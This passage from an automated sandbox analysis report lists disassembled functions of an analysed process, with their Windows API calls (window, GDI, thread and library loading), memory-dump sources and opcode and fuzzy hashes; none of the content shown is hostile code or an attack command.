                                                                  • Instruction ID: 665804b4c82ee28bfaa76f306ec28a46822d7b275fb0a0689d10e27d332061a0
                                                                  • Opcode Fuzzy Hash: 16bae022074c54ad15f5bc18659737c51fe1fd70e10fb9027ad86979a3b6e447
                                                                  • Instruction Fuzzy Hash: AA21A3701446019F8710EF24D88089BBBEAFE5A364F104B1DF499C72E1E730D946CFA2
                                                                  Function 006B321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 006B32A6
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B32C0
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B32CE
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006B32DC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 19c1b0b39d33f4df5296294b6e87575009725a37f3b74a0d4c6ad6d7a86e5958
                                                                  • Instruction ID: 1db48281c2f6999cd273b6a971bb4e50df917480284c445d0f93e1ffe10fa4ad
                                                                  • Opcode Fuzzy Hash: 19c1b0b39d33f4df5296294b6e87575009725a37f3b74a0d4c6ad6d7a86e5958
                                                                  • Instruction Fuzzy Hash: E121A171704521AFD7549B24C845FEA7B96AF85324F24825CF8268B392CB71EE81CBD0
                                                                  Function 0068825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00688271,?,000000FF,?,006890BB,00000000,?,0000001C,?,?), ref: 006896F3
                                                                    • Part of subcall function 006896E4: lstrcpyW.KERNEL32(00000000,?,?,00688271,?,000000FF,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 00689719
                                                                    • Part of subcall function 006896E4: lstrcmpiW.KERNEL32(00000000,?,00688271,?,000000FF,?,006890BB,00000000,?,0000001C,?,?), ref: 0068974A
                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 0068828A
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 006882B0
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,006890BB,00000000,?,0000001C,?,?,00000000), ref: 006882EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: e433c15d401fe04648fa187998619783fb37f3e1a178d0ca850e8c882d9c2726
                                                                  • Instruction ID: 1bf8ad706d3f4e4fad6a0a2cb4ac4395c3e5500f879f5ff3842f831f25c325a6
                                                                  • Opcode Fuzzy Hash: e433c15d401fe04648fa187998619783fb37f3e1a178d0ca850e8c882d9c2726
                                                                  • Instruction Fuzzy Hash: 5B11E47A200241AFDB146F78C844DBA77AAFF45750B50422AF902CB390EF319941C7A4
                                                                  Function 006B60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 006B615A
                                                                  • _wcslen.LIBCMT ref: 006B616C
                                                                  • _wcslen.LIBCMT ref: 006B6177
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B62B5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend_wcslen
                                                                  • String ID:
                                                                  • API String ID: 455545452-0
                                                                  • Opcode ID: 2448baa57807428107bf18663f0039d8a08be6f6578d34a9c511adeb6278a876
                                                                  • Instruction ID: 688ca5bb512f39e81c2949c1cdd7029d5f7bcd88b427eb5a9133eeed3fe306b8
                                                                  • Opcode Fuzzy Hash: 2448baa57807428107bf18663f0039d8a08be6f6578d34a9c511adeb6278a876
                                                                  • Instruction Fuzzy Hash: A611D3B5540219A6DB20DF68CCC4AFF77BEEB15350B14412AFA11D6181EB78C9C5CF61
                                                                  Function 00652079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f787b82cd6a64b59c2133bad4434c5de19958d13664a71a5a2e4f297d19f2994
                                                                  • Instruction ID: 5c09b030fa3cf844ab6a3bf2cb70dd0d785bc1aed125cdee1bd70cbe819e8300
                                                                  • Opcode Fuzzy Hash: f787b82cd6a64b59c2133bad4434c5de19958d13664a71a5a2e4f297d19f2994
                                                                  • Instruction Fuzzy Hash: BE018FB220A2177EE72126786CD0F67671FDF523BAF301329FD21A52D1EA608C888164
                                                                  Function 00682374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00682394
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006823A6
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006823BC
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006823D7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: ec9a75a385f95f1e431fd40511cdfd6a496c3ee24fc4edfbff8fd2faef865f31
                                                                  • Instruction ID: f58a8087b5ad03188040a7def21b09df8399cb7641e2e5de4ba5be37fee2bdda
                                                                  • Opcode Fuzzy Hash: ec9a75a385f95f1e431fd40511cdfd6a496c3ee24fc4edfbff8fd2faef865f31
                                                                  • Instruction Fuzzy Hash: 3811397A900229FFEB11ABA4CD95FDDBBB9FB08750F200191EA00B7290D6716E10DB94
                                                                  Function 0068EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0068EB14
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 0068EB47
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0068EB5D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0068EB64
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  • Opcode ID: 015b343a46f9db247e4c61b76b0a01d418175c3a54e40132e55892f87234cd2f
                                                                  • Instruction ID: 1b98c09f9a7fcf85cd67ac7ffbe072aeb6686ae09de61e4cc256dd4d4877809a
                                                                  • Opcode Fuzzy Hash: 015b343a46f9db247e4c61b76b0a01d418175c3a54e40132e55892f87234cd2f
                                                                  • Instruction Fuzzy Hash: E71126B6904219BBC701ABA89C05ADF7FAFAB46320F004316F815E3390EA75C9048BA0
                                                                  Function 0064D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,?,0064D369,00000000,00000004,00000000), ref: 0064D588
                                                                  • GetLastError.KERNEL32 ref: 0064D594
                                                                  • __dosmaperr.LIBCMT ref: 0064D59B
                                                                  • ResumeThread.KERNEL32(00000000), ref: 0064D5B9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 173952441-0
                                                                  • Opcode ID: 15343255cebe2f8b9c41cb9838a4c10e976ed5406015ecff17ef4f89c25045e8
                                                                  • Instruction ID: d465cebe990d6133d7350f407786ee111183465bbd6156f43d9d7d9292bb2c69
                                                                  • Opcode Fuzzy Hash: 15343255cebe2f8b9c41cb9838a4c10e976ed5406015ecff17ef4f89c25045e8
                                                                  • Instruction Fuzzy Hash: 4E01F972800114BBCB256FA5DC09BAE7BABEF42335F100319F925862E0DF708841C6A1
                                                                  Function 00627873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006278B1
                                                                  • GetStockObject.GDI32(00000011), ref: 006278C5
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 006278CF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  • Opcode ID: 817ca28266d38aa27f55ed6276e7a83bfe3f3681f1f9c54f9ac974f33f125629
                                                                  • Instruction ID: 6efe6b78d2769c5bc80e91411bc1bebae7f6024aba09e56246f1f565543d8055
                                                                  • Opcode Fuzzy Hash: 817ca28266d38aa27f55ed6276e7a83bfe3f3681f1f9c54f9ac974f33f125629
                                                                  • Instruction Fuzzy Hash: 9311A17250591DBFDF165F90EC58EEA7B6AFF08364F041225FA0456110D7359CA0EFA0
                                                                  Function 006533E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue), ref: 00653418
                                                                  • GetLastError.KERNEL32(?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue,006C3260,FlsSetValue,00000000,00000364,?,006531B9), ref: 00653424
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue,006C3260,FlsSetValue,00000000), ref: 00653432
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: 09d1db542cc34f14d36fb9e9ecfd1108d3edb291b5eed20f908560b692f1c492
                                                                  • Instruction ID: 21dc5382e39123e184d36905cf30698cca8da2ca048fa1e37cf054a7f9bebd66
                                                                  • Opcode Fuzzy Hash: 09d1db542cc34f14d36fb9e9ecfd1108d3edb291b5eed20f908560b692f1c492
                                                                  • Instruction Fuzzy Hash: 09018872611232ABC7224B799C449967BDAAF05FE2F214620FD06D7341D731DE46C6E0
                                                                  Function 0068BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BA8B
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BAB0
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BABA
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BAED
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: ca7570482ff7fd891d7c72ca110b5c5707f5958b24987a3866acb97187f00da6
                                                                  • Instruction ID: 1be94e826371a28b73c7b8da0aaee2f37d5559deaf48fd94fb0f655c487da5e3
                                                                  • Opcode Fuzzy Hash: ca7570482ff7fd891d7c72ca110b5c5707f5958b24987a3866acb97187f00da6
                                                                  • Instruction Fuzzy Hash: 40118E74C00619E7CF04EFA8E9486EEBB7AFF09711F101285D541B6280DB705650CBA5
                                                                  Function 006B886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 006B888E
                                                                  • ScreenToClient.USER32(?,?), ref: 006B88A6
                                                                  • ScreenToClient.USER32(?,?), ref: 006B88CA
                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006B88E5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                  • String ID:
                                                                  • API String ID: 357397906-0
                                                                  • Opcode ID: 4066ef3cab35eb01bf2a307a9f91fdbbeec2c3eb521a09f7d185db7de9567c35
                                                                  • Instruction ID: d381afe840179644b0e509edff23d44d9f1e1b4765fe7e44d792a259235f4996
                                                                  • Opcode Fuzzy Hash: 4066ef3cab35eb01bf2a307a9f91fdbbeec2c3eb521a09f7d185db7de9567c35
                                                                  • Instruction Fuzzy Hash: B61144B9D00209EFDB41CF98C8849EEBBF9FB08314F505156E915E3210E735AA94CF50
                                                                  Function 006836F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00683712
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00683723
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0068372A
                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00683731
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 9f407446422970728caa5b12be731b09c56c29cc66432b1fd6c241e8fde62923
                                                                  • Instruction ID: 2505e011b0230b9b6a1de8762255ffbcc7a556d513a4b6186854ecb2c028101d
                                                                  • Opcode Fuzzy Hash: 9f407446422970728caa5b12be731b09c56c29cc66432b1fd6c241e8fde62923
                                                                  • Instruction Fuzzy Hash: 42E092F11012347BDB2027A29C4DEEB7F6EDF46FA1F400215F206D6180FAA0C980C2B0
                                                                  Function 006B92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00621F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00621F87
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621F96
                                                                    • Part of subcall function 00621F2D: BeginPath.GDI32(?), ref: 00621FAD
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621FD6
                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 006B92E3
                                                                  • LineTo.GDI32(?,?,?), ref: 006B92F0
                                                                  • EndPath.GDI32(?), ref: 006B9300
                                                                  • StrokePath.GDI32(?), ref: 006B930E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  • Opcode ID: 7266a3f56b4224cd3451fc05d06197691d6a70f54ebb8c9545a8834005391ff3
                                                                  • Instruction ID: dc68918f418f6577f8c60c4a2bbb968bab26a767a7ff255afaa90b2506216f82
                                                                  • Opcode Fuzzy Hash: 7266a3f56b4224cd3451fc05d06197691d6a70f54ebb8c9545a8834005391ff3
                                                                  • Instruction Fuzzy Hash: 2CF05471005265BBDB126F54AC0EFDE3F6B9F0A320F049100FA11651E1C7B555A1DFA5
                                                                  Function 006221A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 006221BC
                                                                  • SetTextColor.GDI32(?,?), ref: 006221C6
                                                                  • SetBkMode.GDI32(?,00000001), ref: 006221D9
                                                                  • GetStockObject.GDI32(00000005), ref: 006221E1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ModeObjectStockText
                                                                  • String ID:
                                                                  • API String ID: 4037423528-0
                                                                  • Opcode ID: e220a91d2bd749d1c0c2fa6a19d68d0e423ac7c653817569067a9cda5c4cf687
                                                                  • Instruction ID: 29efb0b23d3b39b7664493789e691173fa8f33df89d99ae65fb761375c8e43ff
                                                                  • Opcode Fuzzy Hash: e220a91d2bd749d1c0c2fa6a19d68d0e423ac7c653817569067a9cda5c4cf687
                                                                  • Instruction Fuzzy Hash: 81E06571240650BADB215F78BC09BE93B52AB12335F048319F7B6581E0D77146809B10
                                                                  Function 0067EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 0067EC36
                                                                  • GetDC.USER32(00000000), ref: 0067EC40
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0067EC60
                                                                  • ReleaseDC.USER32(?), ref: 0067EC81
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 7898ed8a1cf907c82829a5b18767c31c40bed6bdec75e5ef7ea60eb770ef7d09
                                                                  • Instruction ID: 5936a1168c15a81eb6591f50d5f90a34b595a19cf6a12faca89707d8fa32ebfc
